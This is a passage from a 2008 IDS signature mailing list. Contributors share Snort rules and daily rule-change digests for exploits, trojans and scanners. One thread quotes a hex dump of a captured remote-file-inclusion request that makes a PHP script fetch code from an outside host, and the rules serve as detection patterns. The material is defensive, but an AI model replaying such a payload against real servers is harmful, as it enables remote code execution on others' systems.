reference:url,www.milw0rm.com/exploits/6613; sid:8417; rev:1;) > > > Looking forward for your comments if any... > > Thanks & Regards, > StillSecure > > > ------------------------------------------------------------------------ > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jonkman at jonkmans.com Sat Oct 4 21:26:22 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Sat, 04 Oct 2008 21:26:22 -0400 Subject: [Emerging-Sigs] Thanks Message-ID: <48E817BE.8040609@jonkmans.com> Just wanted to say a big thanks to two big sig contributors this week. Stillsecure.com for a range of goodies. And Kevin Ross for the slew of VOIP sigs. All are very appreciated guys!! Matt -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From dxp2532 at gmail.com Sat Oct 4 23:11:29 2008 From: dxp2532 at gmail.com (dxp) Date: Sat, 04 Oct 2008 23:11:29 -0400 Subject: [Emerging-Sigs] P2P Software - Pando Message-ID: <1223176289.7169.6.camel@kinta> Saw this recently on the wire, belongs to yet another P2P application called Pando (www.pando.com/what). User-Agent: Mozilla/4.0 (Windows; U) Pando/1.9.5.9 - -=[ dxp ]=- 0xA3F3C6E3 -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081004/aa1b0edb/attachment.html -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: This is a digitally signed message part Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081004/aa1b0edb/attachment.bin From jonkman at jonkmans.com Sun Oct 5 10:31:01 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Sun, 05 Oct 2008 10:31:01 -0400 Subject: [Emerging-Sigs] P2P Software - Pando In-Reply-To: <1223176289.7169.6.camel@kinta> References: <1223176289.7169.6.camel@kinta> Message-ID: <48E8CFA5.9020305@jonkmans.com> Assuming this is on port 80 primarily, or on high ports? Thanks dxp! Matt dxp wrote: > Saw this recently on the wire, belongs to yet another P2P application > called Pando (www.pando.com/what). > User-Agent: Mozilla/4.0 (Windows; U) Pando/1.9.5.9 > > - > > -=[ dxp ]=- > 0xA3F3C6E3 > > > > > ------------------------------------------------------------------------ > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From emerging at emergingthreats.net Sun Oct 5 16:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Sun, 5 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081005200008.EA4BC45026@goliath.jonkmans.com> [***] Results from Oinkmaster started Sun Oct 5 16:00:08 2008 [***] [+++] Added rules: [+++] 2008618 - ET DOS IAS Helper COM Component iashlpr.dll activex remote DOS (emerging-dos.rules) 2008619 - ET EXPLOIT Novell ZENWorks for Desktops Remote Heap-Based Buffer Overflow (emerging-exploit.rules) 2008620 - ET EXPLOIT Internet Information Service iisext.dll activex setpassword Insecure Method (emerging-exploit.rules) 2008621 - ET EXPLOIT Internet Information Service adsiis.dll activex remote DOS (emerging-exploit.rules) 2008622 - ET WEB Pritlog index.php filename File Disclosure (emerging-web.rules) 2008623 - ET TROJAN Cinmus.Checkin 1 (emerging-virus.rules) 2008624 - ET TROJAN Cinmus.Checkin 2 (emerging-virus.rules) 2008625 - ET P2P Pando Client User-Agent Detected (Mozilla/4.0 (Windows\; U) Pando/1.xx) (emerging-p2p.rules) 2008626 - ET TROJAN PlayMP3z.biz Related Spyware/Trojan Install Report (emerging-virus.rules) 2406029 - ET RBN Known Russian Business Network Monitored Domains (30) (emerging-rbn.rules) 2406030 - ET RBN Known Russian Business Network Monitored Domains (31) (emerging-rbn.rules) 2407029 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (30) (emerging-rbn-BLOCK.rules) 2407030 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (31) (emerging-rbn-BLOCK.rules) [///] Modified active rules: [///] 2406000 - ET RBN Known Russian Business Network Monitored Domains (1) (emerging-rbn.rules) 2406001 - ET RBN Known Russian Business Network Monitored Domains (2) (emerging-rbn.rules) 2406002 - ET RBN Known Russian Business Network Monitored Domains (3) (emerging-rbn.rules) 2406003 - ET RBN Known Russian Business Network Monitored Domains (4) (emerging-rbn.rules) 2406004 - ET RBN Known Russian Business Network Monitored Domains (5) (emerging-rbn.rules) 2406005 - ET RBN Known Russian Business Network Monitored Domains (6) (emerging-rbn.rules) 2406006 - ET RBN Known Russian Business Network Monitored Domains (7) (emerging-rbn.rules) 2406007 - ET RBN Known Russian Business Network Monitored Domains (8) (emerging-rbn.rules) 2406008 - ET RBN Known Russian Business Network Monitored Domains (9) (emerging-rbn.rules) 2406009 - ET RBN Known Russian Business Network Monitored Domains (10) (emerging-rbn.rules) 2406010 - ET RBN Known Russian Business Network Monitored Domains (11) (emerging-rbn.rules) 2406011 - ET RBN Known Russian Business Network Monitored Domains (12) (emerging-rbn.rules) 2406012 - ET RBN Known Russian Business Network Monitored Domains (13) (emerging-rbn.rules) 2406013 - ET RBN Known Russian Business Network Monitored Domains (14) (emerging-rbn.rules) 2406014 - ET RBN Known Russian Business Network Monitored Domains (15) (emerging-rbn.rules) 2406015 - ET RBN Known Russian Business Network Monitored Domains (16) (emerging-rbn.rules) 2406016 - ET RBN Known Russian Business Network Monitored Domains (17) (emerging-rbn.rules) 2406017 - ET RBN Known Russian Business Network Monitored Domains (18) (emerging-rbn.rules) 2406018 - ET RBN Known Russian Business Network Monitored Domains (19) (emerging-rbn.rules) 2406019 - ET RBN Known Russian Business Network Monitored Domains (20) (emerging-rbn.rules) 2406020 - ET RBN Known Russian Business Network Monitored Domains (21) (emerging-rbn.rules) 2406021 - ET RBN Known Russian Business Network Monitored Domains (22) (emerging-rbn.rules) 2406022 - ET RBN Known Russian Business Network Monitored Domains (23) (emerging-rbn.rules) 2406023 - ET RBN Known Russian Business Network Monitored Domains (24) (emerging-rbn.rules) 2406024 - ET RBN Known Russian Business Network Monitored Domains (25) (emerging-rbn.rules) 2406025 - ET RBN Known Russian Business Network Monitored Domains (26) (emerging-rbn.rules) 2406026 - ET RBN Known Russian Business Network Monitored Domains (27) (emerging-rbn.rules) 2406027 - ET RBN Known Russian Business Network Monitored Domains (28) (emerging-rbn.rules) 2406028 - ET RBN Known Russian Business Network Monitored Domains (29) (emerging-rbn.rules) 2407000 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (1) (emerging-rbn-BLOCK.rules) 2407001 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (2) (emerging-rbn-BLOCK.rules) 2407002 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (3) (emerging-rbn-BLOCK.rules) 2407003 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (4) (emerging-rbn-BLOCK.rules) 2407004 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (5) (emerging-rbn-BLOCK.rules) 2407005 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (6) (emerging-rbn-BLOCK.rules) 2407006 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (7) (emerging-rbn-BLOCK.rules) 2407007 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (8) (emerging-rbn-BLOCK.rules) 2407008 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (9) (emerging-rbn-BLOCK.rules) 2407009 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (10) (emerging-rbn-BLOCK.rules) 2407010 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (11) (emerging-rbn-BLOCK.rules) 2407011 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (12) (emerging-rbn-BLOCK.rules) 2407012 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (13) (emerging-rbn-BLOCK.rules) 2407013 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (14) (emerging-rbn-BLOCK.rules) 2407014 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (15) (emerging-rbn-BLOCK.rules) 2407015 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (16) (emerging-rbn-BLOCK.rules) 2407016 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (17) (emerging-rbn-BLOCK.rules) 2407017 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (18) (emerging-rbn-BLOCK.rules) 2407018 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (19) (emerging-rbn-BLOCK.rules) 2407019 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (20) (emerging-rbn-BLOCK.rules) 2407020 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (21) (emerging-rbn-BLOCK.rules) 2407021 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (22) (emerging-rbn-BLOCK.rules) 2407022 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (23) (emerging-rbn-BLOCK.rules) 2407023 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (24) (emerging-rbn-BLOCK.rules) 2407024 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (25) (emerging-rbn-BLOCK.rules) 2407025 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (26) (emerging-rbn-BLOCK.rules) 2407026 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (27) (emerging-rbn-BLOCK.rules) 2407027 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (28) (emerging-rbn-BLOCK.rules) 2407028 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (29) (emerging-rbn-BLOCK.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-dos.rules (1): #by Stillsecure (stillsecure.com) -> Added to emerging-exploit.rules (2): #by Stillsecure (stillsecure.com) #by Stillsecure (www.stillsecure.com) -> Added to emerging-p2p.rules (1): #by dxp -> Added to emerging-rbn-BLOCK.rules (2): # VERSION 78 # Updated 2008-10-04 20:39:29 -> Added to emerging-rbn.rules (2): # VERSION 78 # Updated 2008-10-04 20:39:29 -> Added to emerging-sid-msg.map (15): 2008618 || ET DOS IAS Helper COM Component iashlpr.dll activex remote DOS || url,securityreason.com/securityalert/4323 || cve,2008-2639 || url,www.securityfocus.com/archive/1/archive/1/496695/100/0/threaded 2008619 || ET EXPLOIT Novell ZENWorks for Desktops Remote Heap-Based Buffer Overflow || url,securitytracker.com/alerts/2008/Sep/1020951.html || bugtraq,31435 2008620 || ET EXPLOIT Internet Information Service iisext.dll activex setpassword Insecure Method || url,www.securityfocus.com/archive/1/archive/1/496694/100/0/threaded || cve,2008-4301 2008621 || ET EXPLOIT Internet Information Service adsiis.dll activex remote DOS || url,securityreason.com/securityalert/4325 || cve,2008-4300 2008622 || ET WEB Pritlog index.php filename File Disclosure || url,www.milw0rm.com/exploits/6613 || url,secunia.com/Advisories/31969/ 2008623 || ET TROJAN Cinmus.Checkin 1 2008624 || ET TROJAN Cinmus.Checkin 2 2008625 || ET P2P Pando Client User-Agent Detected (Mozilla/4.0 (Windows\; U) Pando/1.xx) 2008626 || ET TROJAN PlayMP3z.biz Related Spyware/Trojan Install Report 2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org 2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org 2406029 || ET RBN Known Russian Business Network Monitored Domains (30) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406030 || ET RBN Known Russian Business Network Monitored Domains (31) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407029 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (30) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407030 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (31) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork -> Added to emerging-sid-msg.map.txt (15): 2008618 || ET DOS IAS Helper COM Component iashlpr.dll activex remote DOS || url,securityreason.com/securityalert/4323 || cve,2008-2639 || url,www.securityfocus.com/archive/1/archive/1/496695/100/0/threaded 2008619 || ET EXPLOIT Novell ZENWorks for Desktops Remote Heap-Based Buffer Overflow || url,securitytracker.com/alerts/2008/Sep/1020951.html || bugtraq,31435 2008620 || ET EXPLOIT Internet Information Service iisext.dll activex setpassword Insecure Method || url,www.securityfocus.com/archive/1/archive/1/496694/100/0/threaded || cve,2008-4301 2008621 || ET EXPLOIT Internet Information Service adsiis.dll activex remote DOS || url,securityreason.com/securityalert/4325 || cve,2008-4300 2008622 || ET WEB Pritlog index.php filename File Disclosure || url,www.milw0rm.com/exploits/6613 || url,secunia.com/Advisories/31969/ 2008623 || ET TROJAN Cinmus.Checkin 1 2008624 || ET TROJAN Cinmus.Checkin 2 2008625 || ET P2P Pando Client User-Agent Detected (Mozilla/4.0 (Windows\; U) Pando/1.xx) 2008626 || ET TROJAN PlayMP3z.biz Related Spyware/Trojan Install Report 2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org 2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org 2406029 || ET RBN Known Russian Business Network Monitored Domains (30) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406030 || ET RBN Known Russian Business Network Monitored Domains (31) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407029 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (30) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407030 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (31) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork -> Added to emerging-web.rules (1): #by Stillsecure (stillsecure.com) [---] Removed non-rule lines: [---] -> Removed from emerging-rbn-BLOCK.rules (2): # VERSION 77 # Updated 2008-10-01 18:23:28 -> Removed from emerging-rbn.rules (2): # VERSION 77 # Updated 2008-10-01 18:23:28 -> Removed from emerging-sid-msg.map (2): 2500075 || ET COMPROMISED Known Compromised or Hostile Host Traffic (76) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510075 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (76) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (2): 2500075 || ET COMPROMISED Known Compromised or Hostile Host Traffic (76) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510075 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (76) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From dxp2532 at gmail.com Sun Oct 5 19:49:59 2008 From: dxp2532 at gmail.com (dxp) Date: Sun, 05 Oct 2008 19:49:59 -0400 Subject: [Emerging-Sigs] P2P Software - Pando In-Reply-To: <48E8CFA5.9020305@jonkmans.com> References: <1223176289.7169.6.camel@kinta> <48E8CFA5.9020305@jonkmans.com> Message-ID: <1223250599.6407.0.camel@kinta> Good catch, sorry about that. Yes, it is on port 80, at least was in my case. - -=[ dxp ]=- 0xA3F3C6E3 On Sun, 2008-10-05 at 10:31 -0400, Matt Jonkman wrote: > Assuming this is on port 80 primarily, or on high ports? > > Thanks dxp! > > Matt > > dxp wrote: > > Saw this recently on the wire, belongs to yet another P2P application > > called Pando (www.pando.com/what). > > User-Agent: Mozilla/4.0 (Windows; U) Pando/1.9.5.9 > > > > - > > > > -=[ dxp ]=- > > 0xA3F3C6E3 > > > > > > > > > > ------------------------------------------------------------------------ > > > > _______________________________________________ > > Emerging-sigs mailing list > > Emerging-sigs at emergingthreats.net > > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081005/84c817d7/attachment.html -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: This is a digitally signed message part Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081005/84c817d7/attachment.bin From pppmarinho at gmail.com Mon Oct 6 08:11:12 2008 From: pppmarinho at gmail.com (Pedro Marinho) Date: Mon, 6 Oct 2008 09:11:12 -0300 Subject: [Emerging-Sigs] Emerging-sigs Digest, Vol 11, Issue 7 In-Reply-To: References: Message-ID: Hello Guys, i did received an attack here so looking at the payload i did this rule because i am quite sure we don?t have a rule for this user agent.. payload comprimento = 256 000 : 47 45 54 20 2F 74 6F 6F 6C 73 2F 73 65 6E 64 5F GET /tools/send_ 010 : 72 65 6D 69 6E 64 65 72 73 2E 70 68 70 3F 6E 6F reminders.php?no 020 : 53 65 74 3D 30 26 69 6E 63 6C 75 64 65 64 69 72 Set=0&includedir 030 : 3D 68 74 74 70 3A 2F 2F 37 32 2E 35 32 2E 32 32 =http://72.52.22 040 : 35 2E 31 31 36 2F 7E 68 65 6C 69 72 75 73 2F 63 5.116/~helirus/c 050 : 73 73 2F 6D 65 65 66 2E 74 78 74 3F 3F 3F 3F 3F ss/meef.txt????? 060 : 2F 20 48 54 54 50 2F 31 2E 31 0D 0A 41 63 63 65 / HTTP/1.1..Acce 070 : 70 74 3A 20 2A 2F 2A 0D 0A 41 63 63 65 70 74 2D pt: */*..Accept- 080 : 4C 61 6E 67 75 61 67 65 3A 20 65 6E 2D 75 73 0D Language: en-us. 090 : 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69 6E 67 .Accept-Encoding 0a0 : 3A 20 67 7A 69 70 2C 20 64 65 66 6C 61 74 65 0D : gzip, deflate. 0b0 : 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 72 .User-Agent: Mor 0c0 : 66 65 75 73 20 46 75 63 6B 69 6E 67 20 53 63 61 feus Fucking Sca 0d0 : 6E 6E 65 72 0D 0A 48 6F 73 74 3A 20 ** ** ** 2E nner..Host: ***. 0e0 : ** ** 2E ** ** ** 2E ** ** 0D 0A 43 6F 6E 6E 65 *.*.*..Conne 0f0 : 63 74 69 6F 6E 3A 20 43 6C 6F 73 65 0D 0A 0D 0A ction: Close.... Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET SCAN Morfeus Fucking Scanner UA Detected"; flow:established,to_server; content:"|0d 0a|User-Agent\: Morfeus Fucking Scanner"; classtype:web-application-activity; sid:2008***; rev:1;) ps: someone did see this in his/her IDS? -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081006/c9ccf6e1/attachment.html From pepperjack at afferentsecurity.com Mon Oct 6 08:23:32 2008 From: pepperjack at afferentsecurity.com (Jack Pepper) Date: Mon, 06 Oct 2008 07:23:32 -0500 Subject: [Emerging-Sigs] rule defect on 2008628 Message-ID: <20081006072332.ifxvtxx7kkok0cww@mail.afferentsecurity.com> it needs to escape the colon on the reference URL: alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET SCAN WSFuzzer Web Application Fuzzing"; flow:to_server,established; content:"/ServiceDefinition HTTP/1.1"; content:"User-Agent\: Python-urllib/"; offset:35; distance:35; classtype:attempted-recon; reference:url,www.owasp.org/index.php/Category\:OWASP_WSFuzzer_Project; sid:2008628; rev:1 ;) -- Framework? I don't need no stinking framework! ---------------------------------------------------------------- @fferent Security Labs: Isolate/Insulate/Innovate http://www.afferentsecurity.com From jonkman at jonkmans.com Mon Oct 6 08:54:27 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Mon, 06 Oct 2008 08:54:27 -0400 Subject: [Emerging-Sigs] rule defect on 2008628 In-Reply-To: <20081006072332.ifxvtxx7kkok0cww@mail.afferentsecurity.com> References: <20081006072332.ifxvtxx7kkok0cww@mail.afferentsecurity.com> Message-ID: <48EA0A83.4080308@jonkmans.com> Got it, thanks! Jack Pepper wrote: > it needs to escape the colon on the reference URL: > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET SCAN > WSFuzzer Web Application Fuzzing"; flow:to_server,established; > content:"/ServiceDefinition HTTP/1.1"; content:"User-Agent\: Python-urllib/"; > offset:35; distance:35; classtype:attempted-recon; > reference:url,www.owasp.org/index.php/Category\:OWASP_WSFuzzer_Project; > sid:2008628; rev:1 ;) > > -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jonkman at jonkmans.com Mon Oct 6 08:56:39 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Mon, 06 Oct 2008 08:56:39 -0400 Subject: [Emerging-Sigs] Emerging-sigs Digest, Vol 11, Issue 7 In-Reply-To: References: Message-ID: <48EA0B07.4090909@jonkmans.com> We have one for this, but I've simplified it a bit: alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB PHP Attack Tool Morfeus F Scanner"; flow:established,to_server; content:"User-Agent\: Morfeus "; nocase; reference:url,www.webmasterworld.com/search_engine_spiders/3227720.htm; classtype:web-application-attack; sid:2003466; rev:4;) Thanks Pedro! Matt Pedro Marinho wrote: > Hello Guys, > > i did received an attack here so looking at the payload i did this rule > because i am quite sure we don?t have a rule for this user agent.. > > > payload > > > comprimento = 256 > > 000 : 47 45 54 20 2F 74 6F 6F 6C 73 2F 73 65 6E 64 5F GET /tools/send_ > > 010 : 72 65 6D 69 6E 64 65 72 73 2E 70 68 70 3F 6E 6F reminders.php?no > > 020 : 53 65 74 3D 30 26 69 6E 63 6C 75 64 65 64 69 72 Set=0&includedir > > 030 : 3D 68 74 74 70 3A 2F 2F 37 32 2E 35 32 2E 32 32 =http://72.52.22 > > 040 : 35 2E 31 31 36 2F 7E 68 65 6C 69 72 75 73 2F 63 5.116/~helirus/c > > 050 : 73 73 2F 6D 65 65 66 2E 74 78 74 3F 3F 3F 3F 3F ss/meef.txt????? > > 060 : 2F 20 48 54 54 50 2F 31 2E 31 0D 0A 41 63 63 65 / HTTP/1.1..Acce > > 070 : 70 74 3A 20 2A 2F 2A 0D 0A 41 63 63 65 70 74 2D pt: */*..Accept- > > 080 : 4C 61 6E 67 75 61 67 65 3A 20 65 6E 2D 75 73 0D Language: en-us. > > 090 : 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69 6E 67 .Accept-Encoding > > 0a0 : 3A 20 67 7A 69 70 2C 20 64 65 66 6C 61 74 65 0D : gzip, deflate. > > 0b0 : 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 72 .User-Agent: Mor > > 0c0 : 66 65 75 73 20 46 75 63 6B 69 6E 67 20 53 63 61 feus Fucking Sca > > 0d0 : 6E 6E 65 72 0D 0A 48 6F 73 74 3A 20 ** ** ** 2E nner..Host: ***. > > 0e0 : ** ** 2E ** ** ** 2E ** ** 0D 0A 43 6F 6E 6E 65 *.*.*..Conne > > 0f0 : 63 74 69 6F 6E 3A 20 43 6C 6F 73 65 0D 0A 0D 0A ction: Close.... > > Rule: > > alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET > SCAN Morfeus Fucking Scanner UA Detected"; flow:established,to_server; > content:"|0d 0a|User-Agent\: Morfeus Fucking Scanner"; > classtype:web-application-activity; sid:2008***; rev:1;) > > ps: someone did see this in his/her IDS? > > > ------------------------------------------------------------------------ > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From pppmarinho at gmail.com Mon Oct 6 09:16:32 2008 From: pppmarinho at gmail.com (Pedro Marinho) Date: Mon, 6 Oct 2008 10:16:32 -0300 Subject: [Emerging-Sigs] Emerging-sigs Digest, Vol 11, Issue 7 In-Reply-To: <48EA0B07.4090909@jonkmans.com> References: <48EA0B07.4090909@jonkmans.com> Message-ID: Ok Matt thank you. 2008/10/6, Matt Jonkman : > > We have one for this, but I've simplified it a bit: > > alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB PHP > Attack Tool Morfeus F Scanner"; flow:established,to_server; > content:"User-Agent\: Morfeus "; nocase; > reference:url,www.webmasterworld.com/search_engine_spiders/3227720.htm; > classtype:web-application-attack; sid:2003466; rev:4;) > > Thanks Pedro! > > Matt > > Pedro Marinho wrote: > > Hello Guys, > > > > i did received an attack here so looking at the payload i did this rule > > because i am quite sure we don?t have a rule for this user agent.. > > > > > > payload > > > > > > comprimento = 256 > > > > 000 : 47 45 54 20 2F 74 6F 6F 6C 73 2F 73 65 6E 64 5F GET /tools/send_ > > > > 010 : 72 65 6D 69 6E 64 65 72 73 2E 70 68 70 3F 6E 6F reminders.php?no > > > > 020 : 53 65 74 3D 30 26 69 6E 63 6C 75 64 65 64 69 72 Set=0&includedir > > > > 030 : 3D 68 74 74 70 3A 2F 2F 37 32 2E 35 32 2E 32 32 =http://72.52.22 > > > > 040 : 35 2E 31 31 36 2F 7E 68 65 6C 69 72 75 73 2F 63 5.116/~helirus/c > > > > 050 : 73 73 2F 6D 65 65 66 2E 74 78 74 3F 3F 3F 3F 3F ss/meef.txt????? > > > > 060 : 2F 20 48 54 54 50 2F 31 2E 31 0D 0A 41 63 63 65 / HTTP/1.1..Acce > > > > 070 : 70 74 3A 20 2A 2F 2A 0D 0A 41 63 63 65 70 74 2D pt: */*..Accept- > > > > 080 : 4C 61 6E 67 75 61 67 65 3A 20 65 6E 2D 75 73 0D Language: en-us. > > > > 090 : 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69 6E 67 .Accept-Encoding > > > > 0a0 : 3A 20 67 7A 69 70 2C 20 64 65 66 6C 61 74 65 0D : gzip, deflate. > > > > 0b0 : 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 72 .User-Agent: Mor > > > > 0c0 : 66 65 75 73 20 46 75 63 6B 69 6E 67 20 53 63 61 feus Fucking Sca > > > > 0d0 : 6E 6E 65 72 0D 0A 48 6F 73 74 3A 20 ** ** ** 2E nner..Host: ***. > > > > 0e0 : ** ** 2E ** ** ** 2E ** ** 0D 0A 43 6F 6E 6E 65 *.*.*..Conne > > > > 0f0 : 63 74 69 6F 6E 3A 20 43 6C 6F 73 65 0D 0A 0D 0A ction: Close.... > > > > Rule: > > > > alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET > > SCAN Morfeus Fucking Scanner UA Detected"; flow:established,to_server; > > content:"|0d 0a|User-Agent\: Morfeus Fucking Scanner"; > > classtype:web-application-activity; sid:2008***; rev:1;) > > > > ps: someone did see this in his/her IDS? > > > > > > ------------------------------------------------------------------------ > > > > _______________________________________________ > > Emerging-sigs mailing list > > Emerging-sigs at emergingthreats.net > > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > > -- > -------------------------------------------- > Matthew Jonkman > Emerging Threats > Phone 765-429-0398 > Fax 312-264-0205 > http://www.emergingthreats.net > -------------------------------------------- > > PGP: http://www.jonkmans.com/mattjonkman.asc > > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081006/b55e271d/attachment.html From emerging at emergingthreats.net Mon Oct 6 16:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Mon, 6 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081006200008.9DC0E45026@goliath.jonkmans.com> [***] Results from Oinkmaster started Mon Oct 6 16:00:08 2008 [***] [+++] Added rules: [+++] 2008546 - ET TROJAN Downloader.vr Checkin part 1 of 2 (emerging-virus.rules) 2008627 - ET SCAN Httprecon Web Server Fingerprint Scan (emerging-scan.rules) 2008628 - ET SCAN WSFuzzer Web Application Fuzzing (emerging-scan.rules) 2008629 - ET SCAN Wikto Backend Data Miner Scan (emerging-scan.rules) [///] Modified active rules: [///] 2003466 - ET WEB PHP Attack Tool Morfeus F Scanner (emerging-web.rules) 2008415 - ET SCAN Cisco Torch IOS HTTP Scan (emerging-scan.rules) 2406000 - ET RBN Known Russian Business Network Monitored Domains (1) (emerging-rbn.rules) 2406001 - ET RBN Known Russian Business Network Monitored Domains (2) (emerging-rbn.rules) 2406002 - ET RBN Known Russian Business Network Monitored Domains (3) (emerging-rbn.rules) 2406003 - ET RBN Known Russian Business Network Monitored Domains (4) (emerging-rbn.rules) 2406004 - ET RBN Known Russian Business Network Monitored Domains (5) (emerging-rbn.rules) 2406005 - ET RBN Known Russian Business Network Monitored Domains (6) (emerging-rbn.rules) 2406006 - ET RBN Known Russian Business Network Monitored Domains (7) (emerging-rbn.rules) 2406007 - ET RBN Known Russian Business Network Monitored Domains (8) (emerging-rbn.rules) 2406008 - ET RBN Known Russian Business Network Monitored Domains (9) (emerging-rbn.rules) 2406009 - ET RBN Known Russian Business Network Monitored Domains (10) (emerging-rbn.rules) 2406010 - ET RBN Known Russian Business Network Monitored Domains (11) (emerging-rbn.rules) 2406011 - ET RBN Known Russian Business 